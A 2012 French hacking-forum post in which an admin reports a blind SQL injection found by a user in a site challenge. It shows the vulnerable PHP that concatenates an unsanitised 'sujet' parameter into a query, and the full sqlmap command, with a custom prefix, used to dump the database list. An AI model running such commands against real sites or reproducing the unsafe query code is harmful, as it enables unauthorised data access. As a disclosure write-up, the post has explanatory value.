Shiney - Hack [blind SQL]

Moderator: Mod

Shiney - Hack [blind SQL]

Postby Korigan » Wed Aug 15, 2012 10:45 pm

Shiney a exploité une blind injection SQL sur le challenge sondage.
Il a ainsi eu la possibilité de lire l'ensemble de la base de données.

[size=18:6deebd9820]Détails :[/size:6deebd9820]
La faille se situe dans le paramètre [b:6deebd9820]sujet[/b:6deebd9820] qui correspond au numéro du sondage que l'on souhaite noter.

[size=18:6deebd9820]Explication :[/size:6deebd9820]

Voici le code en question
[code:1:6deebd9820]$note=$_POST['valeur'];
$sujet=$_POST['sujet'];

if ($note<=10){ //si le vote n'est pas truqué
$requete="select total from sondage where id=".$sujet;
$result=mysql_query($requete);
[/code:1:6deebd9820]

Comme on peut le voir le paramètre [b:6deebd9820]sujet[/b:6deebd9820] est ajouté dans la requete SQL sans être analysé. Shiney a donc pu en prendre le contrôle sans contrainte.

[size=18:6deebd9820]Commande:[/size:6deebd9820]
[code:1:6deebd9820]./sqlmap.py -u "http://hackbbs.org/miss/5/valider.php" -p sujet --data="sujet=&valeur=1" --cookie="PHPSESSID=*COOKIE de Shiney*;name=YENIHS;" --technique=B --string=selectionner --level=2 --prefix="1 and 1=(select 1 FROM information_schema.tables WHERE 1=1" --suffix=")" --dbs[/code:1:6deebd9820]
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby KEV-1 » Thu Aug 16, 2012 7:21 am

1 seul mot : bravo.
... pour celle la et les autres ... ;)
User avatar
KEV-1
 
Posts: 462
Joined: Tue Oct 20, 2009 9:24 pm


Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 1 guest

cron